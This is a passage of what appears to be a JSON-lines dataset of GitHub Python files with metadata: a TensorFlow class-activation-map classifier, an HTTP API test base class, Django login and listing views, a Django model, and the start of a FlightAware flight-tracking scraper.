"line_number": 62, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pyrogram.Client.on_message", "line_number": 47, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 47, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 48, "usage_type": "call"}, {"api_name": "config.SUDO_USERS", "line_number": 48, "usage_type": "argument"}, {"api_name": "pyrogram.filters", "line_number": 48, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 48, "usage_type": "call"}, {"api_name": "config.HNDLR", "line_number": 48, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 67, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 75, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 76, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 77, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 78, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 79, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 82, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 83, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 84, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 85, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 66, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 66, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 66, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 66, "usage_type": "name"}, {"api_name": 
"config.HNDLR", "line_number": 66, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 91, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 90, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 90, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 90, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 90, "usage_type": "name"}, {"api_name": "config.HNDLR", "line_number": 90, "usage_type": "name"}]} +{"seq_id": "73138184193", "text": "import pickle\n\nimport tensorflow as tf\nfrom datasets.dataset import Dataset\nfrom datasets.cifar10_data import Cifar10_Dataset\nfrom datasets.imagenet_data import Imagenet_Dataset\nfrom utils import show_graph, save_graph_txt\n\nfrom classification_models.classification_model import Abstract_model\n\nslim = tf.contrib.slim\nfrom tensorflow.contrib.layers.python.layers import layers as layers_lib\nfrom tensorflow.contrib.layers.python.layers import utils\nfrom tensorflow.python.ops import variable_scope\nfrom tensorflow.contrib import layers\nfrom tensorflow.contrib.framework.python.ops import arg_scope\nimport numpy as np\nimport cv2\n\ndef get_slim_arch_bn(inputs, isTrainTensor, num_classes=1000, scope='vgg_16'):\n with variable_scope.variable_scope(scope, 'vgg_16', [inputs]) as sc:\n end_points_collection = sc.original_name_scope + '_end_points'\n # Collect outputs for conv2d, fully_connected and max_pool2d.\n\n filters = 64\n\n # Arg scope set default parameters for a list of ops\n with arg_scope([layers.conv2d, layers_lib.fully_connected,\n layers_lib.max_pool2d],\n outputs_collections=end_points_collection):\n net = layers_lib.repeat(inputs, 2, layers.conv2d, filters, [3, 3],\n scope='conv1',\n weights_regularizer=slim.l2_regularizer(\n 0.01))\n bn_0 = tf.contrib.layers.batch_norm(net, center=True, scale=True,\n is_training=isTrainTensor,\n scope='bn1', decay=0.9)\n p_0 = layers_lib.max_pool2d(bn_0, [2, 2], scope='pool1')\n\n net = layers_lib.repeat(p_0, 2, layers.conv2d, filters, [3, 3],\n scope='conv2',\n weights_regularizer=slim.l2_regularizer(\n 0.01))\n bn_1 = tf.contrib.layers.batch_norm(net, center=True, scale=True,\n is_training=isTrainTensor,\n scope='bn2', decay=0.9)\n res_1 = p_0 + bn_1\n p_1 = layers_lib.max_pool2d(res_1, [2, 2], scope='pool2')\n\n net = layers_lib.repeat(p_1, 3, layers.conv2d, filters, [4, 4],\n scope='conv3',\n weights_regularizer=slim.l2_regularizer(\n 0.01))\n bn_2 = tf.contrib.layers.batch_norm(net, center=True, scale=True,\n is_training=isTrainTensor,\n scope='bn3', decay=0.9)\n res_2 = p_1 + bn_2\n p_2 = layers_lib.max_pool2d(res_2, [2, 2], scope='pool3')\n\n net = layers_lib.repeat(p_2, 3, layers.conv2d, filters, [5, 5],\n scope='conv4',\n weights_regularizer=slim.l2_regularizer(\n 0.01))\n bn_3 = tf.contrib.layers.batch_norm(net, center=True, scale=True,\n is_training=isTrainTensor,\n scope='bn4', decay=0.9)\n res_3 = p_2 + bn_3\n p_3 = layers_lib.max_pool2d(res_3, [2, 2], scope='pool4')\n\n last_conv = net = layers_lib.repeat(p_3, 3, layers.conv2d, filters,\n [5, 5], scope='conv5',\n weights_regularizer=slim.l2_regularizer(\n 0.01))\n\n # Here we have 14x14 filters\n net = tf.reduce_mean(net, [1, 2]) # Global average pooling\n\n # add layer with float 32 mask of same shape as global average pooling out\n # feed default with ones, leave placeholder\n\n mask = tf.placeholder_with_default(tf.ones_like(net),\n shape=net.shape, name='gap_mask')\n net = tf.multiply(net, mask)\n\n net = 
layers_lib.fully_connected(net, num_classes,\n                                           activation_fn=None,\n                                           biases_initializer=None,\n                                           scope='softmax_logits')\n\n        with tf.variable_scope(\"raw_CAM\"):\n            w_tensor_name = \"vgg_16/softmax_logits/weights:0\"\n            s_w = tf.get_default_graph().get_tensor_by_name(w_tensor_name)\n            softmax_weights = tf.expand_dims(tf.expand_dims(s_w, 0),\n                                             0)  # reshape to match 1x1xFxC\n            # tensor mult from (N x lh x lw x F) , (1 x 1 x F x C)\n            cam = tf.tensordot(last_conv, softmax_weights, [[3], [2]],\n                               name='cam_out')\n\n        # Convert end_points_collection into an end_point dict.\n        end_points = utils.convert_collection_to_dict(end_points_collection)\n        return net, end_points\n\n\nclass imagenet_classifier_cam_loss_AUTO(Abstract_model):\n\n    def __init__(self, dataset: Dataset, debug=False,\n                 name='imagenet_classifier',fixed_mask_file=None):\n        super().__init__(dataset, debug, name)\n\n        self.reg_factor = 0.1\n        self.lr = 0.0001\n\n        if fixed_mask_file:\n            with open(fixed_mask_file, 'rb') as f:\n                t = pickle.load(f)['masks']\n            self.fixed_mask_file = {k : (None,t[k]) for k in t}\n\n\n    def prepare_feed(self, is_train=False, debug=False):\n        if not hasattr(self, 'fixed_mask_file') or (self.fixed_mask_file is None):  # no fixed-mask file given\n            return super().prepare_feed(is_train=is_train,debug=debug)\n\n        else:\n            use_simple_index=False\n            base_fd = super().prepare_feed(is_train=is_train, debug=True)\n            ex_input = base_fd['model_input:0']\n\n            conv_acts, indexs = self.sess.run([self.last_conv, 'indexs_input:0'],base_fd)\n\n            batch_size = ex_input.shape[0]\n            h, w, c = conv_acts.shape[1], conv_acts.shape[2], conv_acts.shape[3]\n\n            base_cam_mask = np.zeros((batch_size, h, w))\n\n            for i in range(len(indexs)):\n                ind_img = indexs[i].decode('utf-8') if not use_simple_index else indexs[i].decode('utf-8').split('__')[1]\n                if ind_img in self.fixed_mask_file:\n                    sel_cam, current_mask = self.fixed_mask_file[ind_img]\n                    down_sampled = cv2.resize(current_mask.astype(np.float32),\n                                              (14, 14))\n                    base_cam_mask[i] = down_sampled\n\n            base_fd['cam_loss_term/cam_mask:0'] = base_cam_mask\n\n            return base_fd\n        pass\n\n    def get_feed_dict(self, isTrain):\n        return {\"phase:0\": isTrain}\n\n    def define_arch(self):\n        phase = tf.placeholder(tf.bool, name='phase')\n\n        # Define the model:\n        predictions, acts = get_slim_arch_bn(self.input_l, phase,\n                                             self.dataset.shape_target[0])\n\n        self.global_step = tf.Variable(0, trainable=False,name='gstp')\n\n\n        # Configure values for visualization\n\n        self.last_conv = acts['vgg_16/conv5/conv5_3']\n        self.softmax_weights = r\"vgg_16/softmax_logits/weights:0\"\n        self.pred = tf.nn.softmax(predictions, name='prediction')\n        self.cam_out = self.graph.get_tensor_by_name('vgg_16/raw_CAM/cam_out:0')\n\n        with tf.variable_scope(\"cam_loss_term\"):\n\n            sq_cam = tf.squeeze(self.cam_out, axis=[3, 4])  # N x hl x wl x C\n\n            # select only the CAM of the PREDICTED class, N x hl x wl x 1\n            sel_index = tf.cast(tf.argmax(self.pred, axis=1), tf.int32)\n            sel_index = tf.stack([tf.range(tf.shape(sq_cam)[0]), sel_index],\n                                 axis=1, name='selected_index')\n\n            # this looks involved, but it just selects, per example, the channel at the given index\n            selected_cam = tf.gather_nd(tf.transpose(sq_cam, perm=[0, 3, 1, 2]),\n                                        sel_index, name='selected_cam')\n\n            act_layer = selected_cam\n\n            # calc mask\n            def e(t):\n                return tf.expand_dims(t,axis=-1)\n            res = e(e(e(tf.reduce_max(act_layer, axis=[1,2]))))\n            cam_mask = tf.cast(act_layer > (res * 0.6), tf.float32)\n\n\n\n            masked_cam = tf.multiply(act_layer,cam_mask,name='masked_cam')\n\n            sum_per_filder = tf.reduce_sum(masked_cam,axis=(1,2))\n            acts_per_mask 
= tf.expand_dims(tf.reduce_sum(cam_mask,axis=(1,2)) + 1 , axis=-1) # add one to avoid divide by zero when no mask\n\n real_prob = tf.reduce_sum(self.targets * self.pred,axis=1)\n self.act_term = tf.reduce_mean(sum_per_filder / tf.squeeze(acts_per_mask), axis=1)\n\n self.act_loss_term = self.act_term * tf.pow(0.2, real_prob/0.7)\n\n\n self.use_switch = tf.placeholder_with_default(tf.zeros_like(self.act_loss_term) ,self.act_loss_term.shape,'use_cam_loss' ) # if 1 use else dont use\n\n self.mean_act_loss_term = tf.reduce_mean(tf.multiply(self.act_loss_term, self.use_switch) )\n\n with tf.variable_scope(\"ce_term\"):\n ce_term = tf.losses.softmax_cross_entropy(self.targets,predictions)\n\n self.loss = ce_term + self.mean_act_loss_term\n\n\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n self.train_step = tf.train.AdamOptimizer(\n learning_rate=self.lr).minimize(self.loss,global_step=self.global_step)\n\n # get accuracy\n prediction = tf.argmax(predictions, 1)\n equality = tf.equal(prediction, tf.argmax(self.targets, 1))\n self.accuracy = tf.reduce_mean(tf.cast(equality, tf.float32))\n\n\n\nif __name__ == \"__main__\":\n from datasets.quickdraw_dataset import QuickDraw_Dataset\n with tf.Session().as_default() as sess:\n t = QuickDraw_Dataset(1, 60,data_folder='./temp/quickdraw_expanded_images')\n\n with imagenet_classifier_cam_loss_AUTO(t, debug=False) as model:\n model.train(save_model=False)\n", "repo_name": "aferral/mejora_clasificador_feedback_CAM", "sub_path": "classification_models/imagenet_subset_cam_loss_auto.py", "file_name": "imagenet_subset_cam_loss_auto.py", "file_ext": "py", "file_size_in_byte": 10347, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tensorflow.contrib", "line_number": 11, "usage_type": "attribute"}, {"api_name": "tensorflow.python.ops.variable_scope.variable_scope", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.python.ops.variable_scope", "line_number": 21, "usage_type": "name"}, {"api_name": "tensorflow.contrib.framework.python.ops.arg_scope", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.conv2d", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers", "line_number": 28, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.fully_connected", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 28, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.max_pool2d", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 29, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.repeat", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 31, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.conv2d", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers", "line_number": 31, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.batch_norm", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.max_pool2d", "line_number": 38, "usage_type": "call"}, {"api_name": 
"tensorflow.contrib.layers.python.layers.layers", "line_number": 38, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.repeat", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 40, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.conv2d", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers", "line_number": 40, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.batch_norm", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.max_pool2d", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 48, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.repeat", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 50, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.conv2d", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers", "line_number": 50, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.batch_norm", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.max_pool2d", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 58, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.repeat", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 60, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.conv2d", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers", "line_number": 60, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.batch_norm", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.max_pool2d", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 68, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.repeat", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 70, "usage_type": "name"}, {"api_name": "tensorflow.contrib.layers.conv2d", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers", "line_number": 70, "usage_type": "name"}, {"api_name": "tensorflow.reduce_mean", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.placeholder_with_default", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.ones_like", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.multiply", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers.fully_connected", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.layers", "line_number": 85, "usage_type": "name"}, {"api_name": "tensorflow.variable_scope", "line_number": 90, "usage_type": "call"}, {"api_name": 
"tensorflow.get_default_graph", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.tensordot", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.utils.convert_collection_to_dict", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.python.layers.utils", "line_number": 100, "usage_type": "name"}, {"api_name": "classification_models.classification_model.Abstract_model", "line_number": 104, "usage_type": "name"}, {"api_name": "datasets.dataset.Dataset", "line_number": 106, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 133, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 139, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.bool", "line_number": 152, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 165, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 165, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 168, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 170, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 173, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 173, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 173, "usage_type": "attribute"}, {"api_name": "tensorflow.stack", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.gather_nd", "line_number": 178, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 178, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 185, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 186, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 187, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 187, "usage_type": "attribute"}, {"api_name": "tensorflow.multiply", "line_number": 191, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 193, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 194, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 194, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 196, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 197, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 197, "usage_type": "call"}, {"api_name": "tensorflow.pow", "line_number": 199, "usage_type": "call"}, {"api_name": "tensorflow.placeholder_with_default", "line_number": 202, "usage_type": "call"}, {"api_name": "tensorflow.zeros_like", "line_number": 202, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 204, "usage_type": "call"}, {"api_name": "tensorflow.multiply", "line_number": 204, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 206, "usage_type": "call"}, {"api_name": 
"tensorflow.losses.softmax_cross_entropy", "line_number": 207, "usage_type": "call"}, {"api_name": "tensorflow.losses", "line_number": 207, "usage_type": "attribute"}, {"api_name": "tensorflow.get_collection", "line_number": 213, "usage_type": "call"}, {"api_name": "tensorflow.GraphKeys", "line_number": 213, "usage_type": "attribute"}, {"api_name": "tensorflow.control_dependencies", "line_number": 214, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 215, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 215, "usage_type": "attribute"}, {"api_name": "tensorflow.argmax", "line_number": 219, "usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 220, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 220, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 221, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 221, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 221, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 227, "usage_type": "call"}, {"api_name": "datasets.quickdraw_dataset.QuickDraw_Dataset", "line_number": 228, "usage_type": "call"}]} +{"seq_id": "38872301200", "text": "#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\nimport json\nimport requests\nimport unittest\nimport sys\nsys.path.append(\"../..\") # 统一将包的搜索路径提升到项目根目录下\n\nfrom lib.read_execl import *\nfrom lib.case_log import log_case_info\n\nclass BaseCase(unittest.TestCase): # 继承unittest.TestCase\n @classmethod\n def setUpClass(cls):\n if cls.__name__ != 'BaseCase':\n cls.data_list = excel_to_list(data_file, cls.__name__)\n\n\n def get_case_data(self, case_name):\n return get_test_data(self.data_list, case_name)\n\n def send_request(self, case_data):\n case_name = get_test_data('case_name')\n url= case_data.get('url')\n args = case_data.get('args')\n headers = case_data.get('headers')\n expect_res = case_data.get('expect_res')\n method = case_data.get('method')\n data_type = case_data.get('data_type')\n\n if method.upper() == 'GET':\n res = requests.get(url=url, params=json.loads(args))\n\n elif data_type.upper == 'FROM':\n res = requests.post(url=url, data=json.loads(args), headers=json.loads(headers))\n log_case_info(case_name, url, args, expect_res, res.text)\n self.assertEqual(res.text, expect_res)\n\n else:\n res = requests.post(url=url, json=json.loads(args), headers=json.loads(headers)) # JSON格式请求\n log_case_info(case_name, url, args, json.dumps(json.loads(expect_res), sort_keys=True),\n json.dumps(res.json(), ensure_ascii=False, sort_keys=True))\n self.assertDictEqual(res.json(), json.loads(expect_res))\n\n", "repo_name": "heartyzw/api-test", "sub_path": "test/case/basecase.py", "file_name": "basecase.py", "file_ext": "py", "file_size_in_byte": 1641, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 12, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 32, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 32, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 35, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 35, "usage_type": "call"}, {"api_name": "lib.case_log.log_case_info", "line_number": 36, 
"usage_type": "call"}, {"api_name": "requests.post", "line_number": 40, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 40, "usage_type": "call"}, {"api_name": "lib.case_log.log_case_info", "line_number": 41, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 41, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "72048190594", "text": "from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom facebook.models import Person\nfrom facebook.forms import LoginForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\n@login_required\ndef index(request):\n search = request.GET.get(\"q\", \"\")\n persons = Person.objects.all().order_by(\"lastname\") if search == \"\" else Person.objects.filter(slug__icontains=search).order_by(\"lastname\")\n paginator = Paginator(persons, 10)\n page = request.GET.get('page')\n\n try:\n persons = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n persons = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n persons = paginator.page(paginator.num_pages)\n\n context = {\n \"search\": search,\n \"persons\": persons,\n \"next_birthday\": Person.objects.get_birthday(4)\n }\n\n return render(request, \"facebook.html\", context)\n\n\n@login_required\ndef person_by_slug(request, slug):\n context = {\n \"person\": Person.objects.get(slug=slug),\n }\n\n return render(request, \"person.html\", context)\n\n\ndef person_login(request):\n next = request.GET.get(\"next\", \"/\")\n\n if request.user.is_authenticated():\n return HttpResponseRedirect(\"/\")\n if request.method == \"POST\":\n form = LoginForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data[\"username\"]\n password = form.cleaned_data[\"password\"]\n person = authenticate(username=username, password=password)\n if person is not None:\n login(request, person)\n return HttpResponseRedirect(next)\n else:\n return render(request, \"login.html\", {\"form\": form})\n else:\n return render(request, \"login.html\", {\"form\": form})\n else:\n context = {\n \"form\": LoginForm()\n }\n\n return render(request, \"login.html\", context)\n\n\ndef person_logout(request):\n logout(request)\n return HttpResponseRedirect(\"/login/\")\n", "repo_name": "hoest/amitie", "sub_path": "facebook/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2096, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "facebook.models.Person.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "facebook.models.Person.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "facebook.models.Person", "line_number": 13, "usage_type": "name"}, {"api_name": "facebook.models.Person.objects.filter", "line_number": 13, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 14, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 19, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 22, "usage_type": "name"}, 
{"api_name": "facebook.models.Person.objects.get_birthday", "line_number": 29, "usage_type": "call"}, {"api_name": "facebook.models.Person.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "facebook.models.Person", "line_number": 29, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 32, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 10, "usage_type": "name"}, {"api_name": "facebook.models.Person.objects.get", "line_number": 38, "usage_type": "call"}, {"api_name": "facebook.models.Person.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "facebook.models.Person", "line_number": 38, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 35, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 48, "usage_type": "call"}, {"api_name": "facebook.forms.LoginForm", "line_number": 50, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 54, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 56, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 61, "usage_type": "call"}, {"api_name": "facebook.forms.LoginForm", "line_number": 64, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 71, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "12794499702", "text": "from django.db import models\n\nfrom quiz.models.questions import Question\n\nclass Choice(models.Model):\n value = models.IntegerField()\n text = models.TextField()\n question = models.ForeignKey(\n Question,\n on_delete=models.CASCADE,\n blank=False,\n related_name='choices',\n null=False\n )", "repo_name": "hazem-elsaayed/personality-test", "sub_path": "server/quiz/models/choices.py", "file_name": "choices.py", "file_ext": "py", "file_size_in_byte": 329, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.models.Model", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 5, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 6, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 6, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 7, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 8, "usage_type": "call"}, {"api_name": "quiz.models.questions.Question", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "36455704734", "text": "#!/usr/bin/env python3\n\n__author__ = \"Md. Minhazul Haque\"\n__version__ = \"0.1.0\"\n__license__ = \"GPLv3\"\n\n\"\"\"\nCopyright (c) 2018 Md. 
Minhazul Haque\nThis file is part of mdminhazulhaque/bd-mrp-api\n(see https://github.com/mdminhazulhaque/banglalionwimaxapi).\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see <http://www.gnu.org/licenses/>.\n\"\"\"\n\nimport json\nfrom datetime import datetime\nimport sys\nimport os\nimport requests\nfrom tabulate import tabulate\n\nBASE = \"https://flightaware.com/live/flight/\"\nHEADERS = [\"time\", \"lat\", \"long\", \"alt\", \"gs\"]\nLIMIT = int(os.environ['LIMIT']) if 'LIMIT' in os.environ else 10\n\nif __name__ == \"__main__\":\n    try:\n        flight = sys.argv[1].strip()\n    except:\n        exit(\"Flight number required\")\n    \n    try:\n        response = requests.get(BASE + flight)\n    except:\n        exit(\"Request cannot be fetched\")\n    \n    # If 301, then get redirected flight name\n    if response.status_code == 301:\n        newurl = response.headers['Location']\n        flight = newurl.split(\"/\")[-1]\n        response = requests.get(BASE + flight)\n    \n    # extract data from script tag in html\n    head = tail = \"\"  # NOTE: the original script-tag marker strings appear to have been stripped from this copy; tail is defined empty so the loop below still runs\n    \n    for line in response.text.split(\"\\n\"):\n        if head 